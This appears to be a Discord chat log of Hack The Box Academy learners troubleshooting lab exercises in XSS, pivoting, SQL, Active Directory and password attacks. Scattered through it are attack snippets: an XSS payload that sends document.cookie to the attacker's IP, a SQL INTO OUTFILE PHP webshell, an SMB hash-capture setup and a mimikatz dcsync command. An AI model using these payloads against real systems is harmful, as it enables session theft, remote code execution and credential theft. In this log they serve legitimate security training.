Hi all, I’m relatively new here. Apologies in advance for the long message, but in a nutshell: can a public IP connect to a ‘private IP’ server hosted on pwnbox? I use pwnbox to do the Academy exercises and I just started a simple php server on 0.0.0.0:8080 (assuming that will start the server on the tun connection using the pwnbox 10-dot IP - but maybe I was wrong?). I got a successful connection from the HTB target which is also on the 10-dot network, but 5 minutes later I noticed that I’m getting several connections from another unrecognised IP starting with 45-dot which from my understanding is a public address? My main confusion comes from the fact that it seems that both a public and a private IP seemed to successfully connect to the server I started on pwnbox - can someone help me understand please?
Never mind I got it, finally exploring and figuring out like a cyber guy 😅 😆
i am really stuck on the xss skill assessment
https://academy.hackthebox.com/module/103/section/1011
i have nc and a php server running on port 1234 and this is my payload:
“><script src=10.10.14.199:1234/script.js/></script>
i dont understand what i am doing wrong
new Image().src='http://OUR_IP/index.php?c='+document.cookie
when it says OUR_IP do they mean the netcat or the php server or what i dont understand
it's likely someone accidentally typed your tun0IP:8080
it's also not completely impossible: considering that the pwnbox has an internet-facing interface
our_ip/your_ip are used interchangeably in the modules to mean your tun0 ip
target_ip is always used to refer to the target
it's almost never left ambiguous
@fathom pendant thank you so much! This definitely makes sense, probs I should just specify my tun0 IP when starting any servers just so I rest assured I’m on the ‘private’ network as much as possible
eh; it's likely just an automated scan
not an actual manual connection
tons of webcrawlers out there scanning every ip under the sun ¯\_(ツ)_/¯
That actually makes me feel a lot better lol - definitely a scanner now that you mention it, super brief and invalid requests
not to mention: not much risk to you since the pwnbox isn't on your local network
Any hint guys?
Hey guys, im working on Login Brute Forcing, Skills assessment - service login.
I'm not sure that I'm working with the right user, can I DM someone to confirm the name?
im trying to capture the mssvc user hash through impacket-smbserver but i get this error, can someone tell me the cause of it?
im in Attacking common services module btw
attacking sql
is your default python env python2?
how can i check that?
if the version
yes it's displaying 2.7.18
i guess i still had this from doing pjpt lmao
I was aware of the first one 😄 -eq for "=" but thanks for the word "substring" I learned something new
Here's my improv on that
SESSION SECURITY
Skills Assessment
- Fuzzed endpoints
- Tried to use XSS payload on all users but no automated actions
- Tried to fixate token using all information about user + date time, tried manual hashing md5 and sha1 as well as hashcat
- Tried to manipulate requests and changing/removing parameter values
- Tried hydra on login page
- Fuzzed for admin through admin directories, and requests that use the email? parameter
- Tried to make Admin public through change parameter
This is the way. Thank you for your help.
i updated to python3 but same error remained

Specify python3 when running the command
i did
have you checked if something is already listening on port 445?
how do you check for that
netstat -tlpn
i see 445
but does this mean it's listening on smth? i dont think so since there is no PID associated there?
seems fine to me
i just rm'd all impacket packages and reinstalled it
i will try if it works
didnt work 😮
||just to make sure i didn't do something wrong : 1- i used mssqlclient.py to connect with htbdbuser creds given ; 2- i tried to execute EXEC master..xp_subdirs '\10.10.14.81\share' but failed due to low privilege, but EXEC master..xp_dirtree '\10.10.10.81\share' works , 3- set up responder with sudo responder -I tun0, 4- attempting to get hashes with sudo impacket-smbserver share ./ -smb2support||
Use pimpmykali and save the pain
i had that before i used it for pjpt
but idk why it didnt work
PEH course?
yes
Anybody else having issues with targets?
i'm having an issue rdp'ing into the network currently
Lol they made cert with 20 hours beginner content
┌─[✗]─[sam@parrot]─[~/enum4linux-ng]
└──╼ $pip3 install -r requirements.txt
error: externally-managed-environment
× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.
If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.
If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.
See /usr/share/doc/python3.11/README.venv for more information.
note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-syst
why doesn't it let me do pip3 on ParrotOS htb edition
I'm working on the skill assessment for the Windows Attack and Defence module. I have completed the attack but I can't find any logs under the Id 4886 or 4887
why
does anyone's target keep spinning while spawning?
I don't know why it's not allowing me to download the mimikatz.exe from the Win32 folder
I tried copying the mimikatz.exe file from the Win32 folder into the ~ directory. It kept accepting, I think, the default mimikatz.exe on my local machine that's from the x64 folder. I want the win32 mimikatz.exe; the internal pivot machine is working with an AMD 32 bit processor.
I tried removing those x64 mimikatz.exe too...and it did not allow me to remove it(even with sudo permissions)
mimikatz x86 cannot access x64 process
nevermind
if i complete like the pentester modules with a silver sub, can i go back and look at those modules if i cancel the sub
if they're all completed?
Yes you unlock the module forever once you’ve completed it.
Attacking Enterprise Network Target is not Spawning..!!!
Any HTB staff here???
Can you link me the module
but in general, reaching out to support is the best option if you run into any issues
since we dont provide any official support over discord unfortunately
Need to speak to a person? Learn how to reach our support via HTB Labs.
Ok got it
Tried spawning one the sections on EU-2 here, worked okay
it worked..!!
Thank you so much..!
Not sure what i did there 😅, but glad it worked!
Anyone else getting spawn issues? Idk if its me or hackthebox itself
Do as Emma said just above here
It worked...!
The mimikatz from the win32 folder looks to be the 32-bit one, and as the error shows: it can't access the 64-bit program (the files that control lsa)
Found the following information in the password cracking module - hydra
"-u loop around users, not passwords (effective! implied with -x)"
But the manual page says different,
"-u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so the first password is tried on all logins, then the next password."
Can anyone explain the difference?
they mean the same thing, -u tries one password against all users then moves on to the next password, instead of the default which tries all passwords against the first user then moves to the next user
thanks for the explanation, got it now
@next bronze
could you help me with this By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe
i went THROUGH EVERY EVENT MANUALLY
was referring to the assembly module, I can't help with cdsa stuff 😅
ok 😦
Also he was talking to someone else fwiw
Is anyone available to help me with "Intro to Network Traffic Analysis"?
its attacking common services module?
im reading it rn, if you wait a few mins i can help you
thanks ^^
Well I'm seeing something that can give you the answer
Zone transferring should work with the right subdomain
Subbrute does not give you records
Just ask your question
yes so I must use dig AXFR?
Yes
It's one of the first things you should have tried after getting some subdomains
Okkk I look now, thanks
👍
same issue here - what was the solution to your problem?
have you added that machine account?
of course I have.. I would never ever skip a part of a module and just start in the middle....
frantically searches for "machine account"
ooof I skipped cross protocol

I don't remember running into the problem, I transferred the latest version of coercer to the attack box since the module info is a bit outdated, the HTTP thing has been fixed in the latest release #858470491676737536 message
yo on the Kerberos attacks, cant crack the hash. need a hint if someone got time.
why wont the hash crack

Which hash can you not crack?
the first one. idk if im supposed to but. john and hashcat wont crack it. idk if im supposed to use cewl on their website etc
Hash from user ||d…||?
||Hashcat || should be fine
Hey guys! 👋 I hope you're all well. I could do with a hand here on Socks Over RDP part of Pivoting module. I transferred the files and verified that the DLL file is in the folder with explorer. However, it's not there when I try to view in cmd.
the first question yeah? hashcat with rockyou should do it
yes but it wont crack. im testing something to test something.
i be back in a min
Trying to register the socksoverrdp-plugin.dll
i cracked it
Did you disable windows Defender?
my theory was right
Nope 😁
so idk why but i get diff hash using kerbrute and the GetNPUsers. idk why but the kerbrute hash is diff so cant crack it but the hash from GetNPUsers does. idk exactly why and how etc. but good to know in the future.
Is this before the transfer? I can see the file there in explorer. Maybe I'll try transfer again
Yes before the transfer, also run PS as administrator.
Nevermind actually it was already off
I'm in cmd so maybe I'll try ps as you said
Hmm. Still only shows the exe when I list files
I'll try again with a python server. I was testing out RDP file share
Ah yes. Could not download. Virus detected
Gracias amigo
Is the target in skill assessment - File Uploads synced with IRL time?
I prefer to ask rather than to spend next few hours banging my head against a wall tryna figure that one out
is a problem if i connect using the openvpn command from my own pc and not using a virtual machine?
not really
though labs are shared if I'm not mistaken
i don’t think that matters
If I can list the upload dir then ye Ig it wont
first find out where your file is getting uploaded 😉
I've got the source code
but the way the file is handled is tied to the current date
yes
Oh thank fuck.
Thx

How does sshuttle compare to ligolo?
Hello, I have a problem with the "Exploiting Web Vulnerabilities in Thick-Client Applications module". The windows machine is so slow that I can't work on it to make the module. I have retrieved the .jar on my attack machine and I am trying to make the module. The problem is that I still can't connect with the identifiers provided, even though I've changed the connection port and added the ip to my /etc/hosts. What's more, every time I try to connect I get this error in my window where I have my VPN Academie activated: Authenticate/Decrypt packet error: packet HMAC authentication failed.
If anyone can help me it would be great as I just need this part to finish my module.
how do you connect to the machine? with xfreerdp?
do you fullscreen it?
For some magical reason windowed RDP connections to windows targets on HTB work at a snail's pace
if not fullscreened
I've discovered it myself a few days ago doing exactly that module
Edit: well actually weeks my bad lol
+f is the switch in xfreerdp
yes I've tried RDP and Xfree rdp both of which are unusable
.
.
nop small
try xfreerdp with +f
I'm going to give it a try, but I'd like to do it from my attack machine.
bro the client connects to a server only accessible from that windows machine
you could in theory port forward
but tbh that might open yet another can of worms issues
¯\_(ツ)_/¯
I'm going to try it out, and it'll be a good opportunity to review pivoting/portforwarding. Thanks
good luck. Also make sure to rebuild the jar EXACTLY as the examples show you. I tried doing it "my way" from just one software provided and it did not go well.
I'll make a note of it, thanks
I finally solved the assessment. Magic numbers and formatting going awry because of wack chars being mangled by my system clipboard are going to trigger a PTSD attack every time I see them from now on.
THANKS ! 😂 😂
im in attacking dns section at attacking common services , i try to use the subbrute to enumerate subdomains available but i get error of no nameservers found
Did you add the domain/IP to the resolvers.txt file ?
if the domain is inlanefreight.htb then yes
What is your command?
nvm i changed to IP and started to work i think
||./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt||
got the flag !
thanks humangod
but still idk why the domain name didnt work
Because htb is not an official TLD and therefore cannot be resolved.
On Introduction to Python 3 - The First Iterations, i can't reach the target, neither through my kali machine or through Pwnbox. Any ideas? Nmap returned results, but the http port doesn't match with the port given as target.
Does anyone know why ZAP never works for 💩... I've configured all the settings required to successfully run ZAP and I can never get traffic to run through the damn thing. SSL certificates installed correctly, foxy proxy settings configured correctly, proxychains.conf file configured correctly, even used ZAP's default settings, restarted all applications, tested zap with curl. Literally have tried everything to no avail, this isn't the first time either
atta boi
good to learn stuff the hard way.
some minor stuff i missed and so on but nothing special
Couldn't agree with you more, HTB does a phenomenal job at setting us up for long term growth vs. transient satisfaction
yeah
Are you aiming towards CPTS?
tho the labs (in this module at least) were a bit slow and on the skills assessment it was just excruciating
Wow now I'm envious, I NEED THAT
haha yeah its kinda cool
I didn't even know you could add that to your discord profile. Now I'm definitely set on getting mine
i didnt myself. HTB does it automatically when u pass and link ur disc and so on
Does it do the same for CBBH or any of the other Certs?
i think so yeah. not sure but should be so
Say lessssss, I was under the impression that we got to show boat a screenshot of our congratulations page one time and that was it, but an icon next to your name indefinitely changes the GAME
can i dm you
sure
haha yeah looks cool.
for how long was your hydra running (approx.) for the password mutations lab? it's currently been running for about an hour, im kinda certain at this point that the password will never crack
as far as i remember it takes a looooot of time. But.. i think if you try -48 and take into account only the passwords with at least 10 chars... you will shorten the time.
thanks for replying
and be careful against which service you use hydra.
yeah i just switched to the "other one"
like 10 minutes ago
it's kinda annoying that it takes so much time, but what can you do i guess
can I dm someone for the XSS assessment?
hi I am stuck in the last assessment of login bruteforcing
I got the employee name from the last section. I created a wordlist using only that name, and generated a user wordlist with that name. I then trimmed the pass wordlist to passwords that match the minimum criteria using sed. The task was to brute force the ssh service (a really bad joke ig) need help plis
Does anyone know how to fix my ZAP issue?
Use Burp 😄
I haven't tried it at all. 😄
This guy🤣😭
i see, makes sense , thanks !
That's if you have silver annual
Hi all, just joined HTB x
ah even so. i did have it when i passed so
Log out and then log in again.
anyone know what kind of rewards you will get from streaks?
whats the most unique thing about it?
i use obsidian which is normal but fancy
gg
son of a gun
what difficulty
medium they say .......
whats would you rate it
medium but the last part was painfully slow
did you watch write ups or soloed it?
solved it with small nudges
cant imagine myself doing easy machine without write up or help
it takes time that's all, there is no magic
so you aint majestic?
I was using my memory 
i wanted to point out that you can do some Ad in this machine but after around 24 hrs hacking i was tired 🙂
I haven't tried obsidian but I'm sold on these note taker things. One giant txt doc just wasn't cutting it once I got to pivoting
obsidian makes you feel fancy
btw got question, i saw that easy challenge C.O.P about sql injection, im currently doing sql injection fundamentals, i literally had no clue about how to perform such things but if i complete the module, will it be possible to do the challenge or i need more than just 1 module and some practice?
asking more superior person
can anyone help me with the question on Password Attacks - Password Reuse / Default Passwords. I've ssh'd as the user from the previous question, am trying to authenticate to mysql as I've seen 3306 is running on the box, I've tried all default creds from the list in the notes, nothing working. Can anyone give me a hint?
but does it take 1 module and some time to do it? or i need more modules as knowledge?
knowledge knowledge knowledge knowledge knowledge
if you just do something every day, the knowledge accumulates over time and you become more familiar with it and before you know it you'll be pretty good
but how much to solve an easy challenge
and if you gain some knowledge after a while you overthink and forget basics
thats much worse 😄

I guess you just gotta dumb down a lot of problems, but yeah I've definitely had moments where I was in over my head trying to do something more complicated than the actual task was
anyone able to help on this?
Hey! Have you looked for default creds?
I couldn't figure out how to write it without spoiling it 😄
Congrats!
i had to create an ssh port forward for it. How come it doesnt work if i ssh to the device then use `mysql -u <user> p <pass> ?
oh
well i feel stupid. if you put a space after the -p option it wont work
had similar issue few days with the module
It's easily done
thanks for your help anyway ha
but now im stuck with the credential hunting in windows, whenever i upload a lazagne.exe file and try to execute it in the windows cmd i get a "This app can't run on your PC". i tried different versions but got similar results
Attacking FTP - The target IP still is not working (not responding to pings or nmap) is this normal for the this module or is something wrong on their end
try to restart the machine or check VPN connection or see if you can access FTP using the ftp command
what's a tcpwrapped nmap keeps showing me this on the hard lab of "network enumeration with nmap"
Hello, I'm having the same issue. Did you figure this out? I'd appreciate any help.
does anyone know why the latest version of lazagne.exe doesn't work in the windows credential harvesting module ?
Guys I am stuck on footprinting module.
Question:
Find out which domain the server belongs to.
Tried:
connecting via rpcclient
Ran enum4linux-ng
for the hard lab just cover the module you read last. Firewall IDS/IPS evasion, follow it stepwise. It worked for me
I believe it means that the port is up but filtered
Hello, I'm working on the Web Requests Module. The question is The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag. And the hint says Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests. I have reloaded a bunch of times, and I don't see anything to a file called flag_... I've tried disabling the cache, and I've reloaded multiple times. I don't see anything. The only thing I can think of is the favicon is coming back with a 404, so is it possible that the webpage is never considered loaded and therefore never triggering the call to the flag? Or is there something else entirely I'm missing?
Nevermind, I found the answer
I looked it up, there is a firewall in place on that port then.
Update I finally succeeded, with chisel, but it's the worst experience I've had since I started. The Windows machine is pure crap. It's a shame because the module is really interesting.
can you provide picture of the network tab
why lazagne.exe doesn't work in windows credential harvesting module
does not work as in?
whenever i run it i get this app doesn't work on your pc error
wasn't me
yeah Ik
honestly I don't remember how I did it. Try downloading a LaZagne copy from a previous lab
and then upload it
Hi guys, I need help with the getting started module
How did attempt to launch it?
you know what labs contains lazagne ?
start lazagne.exe all
.\startlazagne.exe all
I got a file from the web server using curl and I don't know how to read/analyze the file
what why start
what kind of file?
Any help?
yes
.\lazagne.exe all should work
If it doesn't back track one lab back
because I assume you uploaded your own copy, correct?
i even tried "powershell -Command Set-ExecutionPolicy Unrestricted"
That's only for ps scripts
I'm trying to get help for the documentation and reporting lab but the message is being deleted
i know i was throwing random stuff around
dm me that shit
if that doesn't work, b64 encode and send it to me lmfao
Maybe I will be able to figure out what is getting filtered
Ye
Still, have you uploaded your own lazagne or did you use the one provided?
Idk, I can't share files in this room
Sure
Lovely. What's the extension and are you working on linux?
if yes then file it
Yeah, extension is simple backup plugin 2.7.10
that's not an extension. It's a wordpress plugin.
anything is sure in the life
bro he doesn't know what a plugin is (apparently) . He really should be doing more research and less searching for exploits blindly : 3
there is a one provided ?
hol' up
should be at C:\Tools
I know the module he's working on
Its more than an educated guess
there is no Tools in C
The module really shoves it in your face
I know. I've exploited that plugin before. WP is a delight to encounter but that's not what I meant
gimme a sec
Sometimes the targets, much like rl, won't have a c:\ tools and you'll need to add it yourself
A plugin is basically like an extension, isn't it
Yeah but certain machines do not work well with latest renditions of these tools
for some damn reason
Not necessarily, when referring to "extensions" most will think file extensions not plugins
i uploaded it but i keep getting "this app can't run on your PC"
in the context of "identifying a file" most think of an extension as in .exe .ps1 .jpg
Then it could be that you're trying to run x64 on an x86
Aka trying to run 64-bit program on a 32-bit machine
Okay
Well I can remember I scanned the target using one of metasploit's auxiliary scanner and it downloaded something like a log file for me but idk what to do with it
reread the lesson and dive into the rabbit hole
it will do you more good to sit now and study than ask what to do with something this basic. You will need it trust me on that : )
There has to be a copy on the machine, I don’t know what you’re doing or which module but if iirc I think I’ve seen lazagne.exe file on either documents / download dir before.
Check there.
Literally the hint said I should search for plugin exploit and the objective says to get the flag.txt after exploiting the target so idk how to exploit the target since I can't find a directory that displays the login page and idk how to get any file that has a list of user to perform bruteforcing
Damn I m out of luck. I solved the module but I don't remember how...
hm...
let me try something
download and documents are empty in john
ill try to check others users
- You don't always need a login page for an exploit
- Search for an exploit. Google is your friend
- You're working with WP which is a Content Management System aka standardization is the name of the game. Chances are it might have a default login path
What part of the getting started section are you on?
exactly what i'm saying, i'm not getting any luck finding a login path but the ssh service is the only open service after scanning
Public exploits
Dude did you put the name of the plugin in the google search bar?
Public Exploits are PUBLIC
Use them nets : 3
still empty
yeah I m jumping into the lab myself
Some plugin exploits allow you to arbitrarily read a file
Yeah I did, I got some info and searched for exploits using searchsploit, then I manually downloaded the exploit and gave permission to run but i get an error message every time i run it and idk bash to analyze the code
I had a similar issue before so I m hoping I can help you. I had to figure it on my own but it was a pain in the ass and I would love to help you
how did you upload the file itself ? i used an open smb share to transfer the file
I think that's what the auxiliary module of metasploit did
I'm confused I did this module 2 days ago as well but I think I must have done it a different way lol
I’ve seen the module now.
You have to transfer it over.
I didn't upload file, I Got a file using one of metasploit auxiliary module
It helps to understand what a module does in Metasploit
You say trouble finding login path we talking http?
The aux module has some options that you can play with
I did read about the info, it's been a couple hours since I performed the exploit so i don't remember
If you got a file, perhaps see what that file is
And figure out how to manipulate the options to get what you want
is it normal to type "type lazagne.exe" and get nothing ? i guess i messed something up while uploading
I have no idea how to help you then and I need to be going now.
But I m 100% sure there is a working copy in the module somewhere
go to the hints, it says find a way to transfer the 3rd party tool
Sounds like your file transfer goofed, xfreerdp and other rdp things allow you to attach a fileshare
I don't understand the language
?
If you check the options of the module you used
It's a fairly obvious file, it's not necessarily written in a programming language
ill cancel my current rdp session and use xfreerdp
I mean if you're using remmina, it also has that option
Check your dm
it worked
i used curl to download it and the binary for some reason was empty
i downloaded it manually and transferred it using the same smb share i created
Hey! Someone can help me with Documentation & report lab? I'm really stuck, I have a lot of creds but I'm not able to answer question 1
Alright
uhh i found a flag from doing sqlmap i try to submit and its not the right answer but it is because i got it from the db so im confused...
I mean you might need to impersonate
I just remember it being a bit of a chain ¯\_(ツ)_/¯
because you're not really prepped for what it wants to do, but it is explained in the mssql section ¯\_(ツ)_/¯
;\
That's what made it click for me
got it, the machine was broken buddy
y btw i had to research on mssql section ty
I dont appreciate your condescension towards me
chillout man
guys I'm really stuck at the password and attacks module section Passwd, Shadow & Opasswd. I found the passwd and shadow files that were hidden, I unshadowed them, and tried to crack using what we find in resources
and it doesn't return anything
been stuck for a while today
Try with rockyou, or the mutated list
how did the -v option make me find the sqli, and without it it didnt find the injection, when the -v option is for different verbosity levels???
sqlmap -u 'http://83.136.252.214:42076/case7.php?id=1' -v --level 5 --risk 3 --dump
without the -v it didnt find it with the -v it did
can someone explain?
v param shouldnt be correlated with that
Are you sure you haven't changed the level or the risk?
lol
🤷♂️
Happens
Hey! Someone can help me with Documentation & report practice lab? I'm really stuck, I have a lot of creds but I'm not able to answer q1
Please
Does anyone notice slow connectivity on the EU 1 server?
my ffuf fuzz runs 3 req/s
I already tried to regenerate a new vpn file
Change region?
eu 2 go little bit better
Dumb link
before you ask I did use a browser sandbox - it was just some random live chat extension emote thing
¯\_(ツ)_/¯ that's all they posted so I'll chalk it up to a failed copy paste
probably 
Anyone able to help a bit with my pivot? for some reason i cant connect to my attack box to download a file. im working on the AD enum & attacks skill assessment. Set up my ligolo and am on ms02 just cant figure out why my file transfer is failing, its like it can communicate but fairly sure i have my listener set up correctly
You need to use the internal IP of WIN01 in this case
^
So ive started on the getting started module and im going through these and i am confused on how some of these got these passwords and usernames and also im wondering what could be a good way to learn this instead of copy pasting
because ive noticed im copy pasting but not learning or maintaining
the getting started module is kind of a showcase on where you want to get to. The following modules in the cpts path explain in more details the intermediate steps
So anyone in particular
or are you talking about starting point on app.hackthebox?
I was also working on the linux starting one
its called getting started
I can dm a picture if that helps
but im on hack the box
and ive done the intro to the academy and a little of intro to linux
ah okay, so you are on the academy part of hackthebox. Theres also the "app" part that has a bunch of machines without much guidance
and what part exactly is confusing you?
but im working on "getting started"
Well while trying to get access to things
im just following the same exact steps they were using
Which is good but i dont feel like im retaining it
Also they have like this one where they got a password and username out of thin air
hm I dont see a password or username in that section?
The one before sorry
When you say use the internal, do you mean in the actual grab command or when setting up the listener?
this exploit doesn't require any authentication
It had something to do with bob
search in-page for bob:
the password is given in the text as "bob:password"
I've noticed that this course requires you to do some independent research on top of what you learn in the course material so simply copying and pasting alone wont work the majority of the time
the IP that's on the same subnet as the machine you're remoted into
putting in a little legwork helps you learn how to unstuck yourself
got it thx, just had a extra .6 lol
172.16.6.6.6 
I agree 100%
but how did i know bob was a person without a hint
lmao yeah caught it right after i posted lmao
unless t stated
it's provided in the text for the section
the whole module is just a quick rundown of how people usually approach boxes on HTB when they want to hack them. It tries to showcase a lot of things without going too much in depth, the example with "bob" was just to show you what it looks like when you have credentials and what it looks like when you don't. You were not supposed to find this out by yourself, but later on you learn techniques that help you figure out what valid users are for example
you're not gonna get into bruteforcing stuff and enumeration until a bit later in the CPTS coursework
99% of the time: (unless otherwise inferred or stated) the info is given to you
yes
Welcome to my world
alright but I still feel like I'm not retaining it
the getting-started module is very much just showcasing common methods
take notes
you're not expected to remember every little nuanced thing ¯_(ツ)_/¯
I've taken notes but it's mainly been the same as the cheatsheet they give you
Once you do a couple labs/exercises it will start to click
then reread and reword your notes to give context
the later modules provide much more context to what's being done
if you actually plan to do the whole cpts path then all the topics in the getting started module will be looked at in much greater detail in individual modules.
I think that's what I'm thinking, I'm just overthinking
your notes should be written in your own words to help you understand it better
avoid technical jargon unless you absolutely need it
and the skill assessments in the modules are usually pretty good in making sure you understood what's happening. As long as you try to solve them yourself without trying to get too much help
is anyone else struggling with the ips and boxes they provide in the modules? they keep disconnecting
whats the cpts path
Like I don't know that abbreviation
I'm having issues with mine as well
try changing vpn regions, using the tcp vpn instead of the udp
the Penetration Tester Job Role Path
ok cool I'll try that
CPTS - Certified Penetration Testing Specialist
good to know it's not just me. it's been super frustrating
Like bug bounty hunting?
HTB has 4 certs; 3 entry 1 intermediate; in order CBBH CPTS CDSA CWEE
nah there's a separate path for that
I haven't been able to get any work done because of it so I've been playing Helldivers 2 all day
That's the plan which was trying to get access into websites
no, that's the Certified Bug Bounty Hunter
sounds hella sus
ohhh that's dope! how is it, I've heard it's super fun
always follow a company's Bounty program for scope
Greatest game I've ever played in my life
Switching vpn regions now though. If it doesn't work I'm calling it a day
alright but will this one be a good one to start off my knowledge for
🦅 For Democracy and Super Earth
I'm hype! definitely going to download it then
Do the Information Security Fundamentals path first
How about a nice cup of liberTEA lol
it will build up a good base for you to jump off of
If you haven't already you're really missing out
take a look at "paths -> job role paths" and then the bug bounty hunter one. It lists 20 modules in order trying to teach you how to pentest websites
alright I'll start that off, I'm quite new to the coding aspect
I'm planning on getting that when my refund comes through
CPTS doesn't cover coding
CBBH does
What coding do you need for bug bounties?
CBBH; Bug hunting and code review- no post-exploitation
Javascript, PHP
I called it coding but aspect-wise, shell stuff
those come immediately to mind
gotcha
shell stuff is generally gonna either be ASM or BASH
iirc there are some simple adaptations to scripts, e.g. writing your own bruteforce script for a web login that reacts to password timeouts
Now I'm sold. I'm starting that course after I finish CPTS
how far are all of you into the cpts path
34.79% - Since IPs aren't working 🙂
cpts covers most of the cbbh part. And it's mostly simple scripts, no huge code projects
I've been working on bash and HTB's parrot stuff
oi I'm only like 12%
I am at the attacking LSASS part of the password attacks module and I have some issue with pypykatz, does anyone know another tool that I can use?
I'm on attacking common services easy lab, I found the creds that logged me into mysql but I have no clue what to do after, couldn't find any useful creds there
and I don't know the location of the flag.txt to execute load_FILE("Path to file")
any hint will be appreciated :3
i mean there's 2 ways to do this; but uploading a simple RCE might work to at least find it 😉
well I thought of rce but I just didn't figure out how yet
I assume you already checked ||ftp||?
mhm and some other stuff
hmm lemme double check and try again
just make sure your code is formatted correctly
and what you're using as your variable
What's the path called?
oh foundations
sorry found it
I'm using
||SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\CoreFTP\webshell.php';||
but idk how to provoke the rce, I browse to that file but nothing
because your filepath is incorrect
look into what the webroot of the web server is
i mean webshell.php?c=<command>
||$_GET['c']|| is requesting the variable, since it's not specified in the file: you can provide it via browser arguments
test with whoami first
then try more complex commands such as "where"
how do you check for that?
it's kinda given to you in some of the documentation stuff
:)
||xampp|| look it up 😉
yes I did it and navigated but it didn't work for some reason
I will restart the lab just in case
good evening. Where do I have to post a question about how to solve a retired machine? I'm stuck
also sometimes you can have the \ the wrong way
thank u
I used
||SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE 'C:\xampp\htdocs\webshell.php';||
and then
||https://[IP]/webshell.php?c=whoami||
but I only get a blank page
is AD module not available on all machines?
it worked but guess what
I used 2 \ in here
and when I navigated it worked
Ah
This is why I like using ` for codeblocks
Discord only displays 1 \ if you do \\ \
yes
If that was in your og copy/paste, discord formatting hid some of your issues
yess probably
In which case it would have been super easy to resolve
Also, did you figure out both intended ways?
||rce, sql||
well do you mean with reading files in sql?
with load_files?
Yep
but wouldn't you need the rce to find the flag.txt location first?
so basically reading the file in sql is just a matter of preference since you already achieved rce, you could just read it directly in the browser no?
||I found the ntlm hash for t***** through an lsa dump but when I use the hashcat command for this user I get no result. I used the rockyou.txt in the kali linux machine:||
sudo hashcat -m 1000 ||fd37b6fec5704cadabb319cebf9e3a3a|| rockyou.txt
Yep
Or just underthinking it lol
Hello, I am trying to work through the pentesting learning module. I am currently on the public exploits section where there is a webserver to try and find the flag. I have run nmap and visited the ip, I know it's a wordpress site with a simple backup 2.7.10 vulnerability. I have run metasploit and found the plugin exploit. I ran it, it gave me back a txt file with various info but I don't know where or how to go from here
Check the options to see what you can change
Investigating that txt file it may look familiar if you know Linux systems
I know a little, but apparently not enough, it has a root user but the password is x'ed out
That's not the focus of this
that's my point, I am not sure what I am missing here
Check the options of the exploit
can you be a bit more specific about what I am checking? I configured the exploit for the right RHOST
There's another option, one that has the path of the file
yes, it's configured for /etc/passwd
hmm, let me go back and check the question
are you saying that the /flag.txt file is a subfolder of the /etc/passwd?
because otherwise I think the question only says to get to the contents of /flag.txt file
I need help with the "Getting Started" module guys
I need help with privilege escalation
I already hacked the ssh server...
Yes /flag.txt
Not a subfolder
Just literally /flag.txt
That doesn't tell much
I already ran the lsa dump in mimikatz and it didn't return the credentials for ||tpetty||
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\tpetty
||
||atz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\tpetty
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\tpetty' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)||||
That error code I think is related to elevated privileges (I am logged in with the user svc_sql) ... and when I ran as 'Administrator' on that machine it did not fix the issue.
And again, I ran the ntlm hash value with hashcat for the users password hash a... and it returned no results.
you are awesome. Thank you
My approach to penetration is to get a privEsc tool to enumerate the SSH server and I'll read the results for vulnerabilities but idk how to get the tool onto the ssh server
I mean you don't necessarily need the tool. But the section should have gone over some basics, or some was gone over earlier
Sometimes a simple sudo -l is helpful enough
I already tried that, I got a result that the current user I'm logged in as has NOPASSWD access to /bin/bash but idk what to do with that
look closer; user1 can do /bin/bash as user2 with sudo perms. man sudo to find out more of the options you can do with sudo
Gonna make me go through this now?😐
yes
I'm helping guide you how to figure it out
giving you the direct command doesn't necessarily help you, except to expect more handouts of the answer
gotta learn how to unstuck yourself
👍
I'm not telling you: LOL go figure it out
I'm telling you: Here's a resource to help you figure it out instead of endless google searches
Something I don't understand. Working on Skill assessment 2 for AD enum & attack. || I ran Responder and it is skipping previously discovered hash... okay whatever. But when I go cat out the hash file there are multiple hashes for the same user. Is this by design?||
it's likely grabbing the hash from another service
so it skips it from the same service
also delete the image as it's still a spoiler
:) (spoiler tags don't really do anything)
quick question, going blind in the enterprise network means doing it without reading the question, right?
without reading the questions or the sections
the lab is used throughout the whole module
and the sections are practically walk-throughs for each bit
so just spawn it and go, until you get the whole domain?
yup until you get DA or SA if it's a whole Forest
nice, tysm
also fwiw i think there's only like 1 thing that wasn't covered but the rest is all you've learned. At least that's what people have said
I've been respawning the machine 1000 times on medium lab and can't find the nonstandard port
only 5 ports are open
it's a double of the standard port fwiw though i think they changed it up
also don't forget to -p- :)
yes I'm doing the -p- now and see how it goes
it's taking forever though
well if you're adding -sC and -sV to a -p- scan it will take a while
like several minutes
I'm doing it without the -sC and -sV
hmm
does slow connection affect the scan duration too?
it can
thank you marcie
I did -T4 and got it :3
in 1min
bruh I think they should switch the difficulty of the two boxes
the easy box was so much harder than the medium one
¯_(ツ)_/¯
SESSION SECURITY
Skills Assessment
Anyone free for a DM?
Hi, does the student subscription give access to the Senior Web Penetration path?
no
oh okay, thank you
the Senior path is tier 3 modules; the student sub only covers up-to and including tier-2
I see man, thank you for the info
Thanks @fathom pendant
you’ll have better luck getting unstuck if you just asked your question
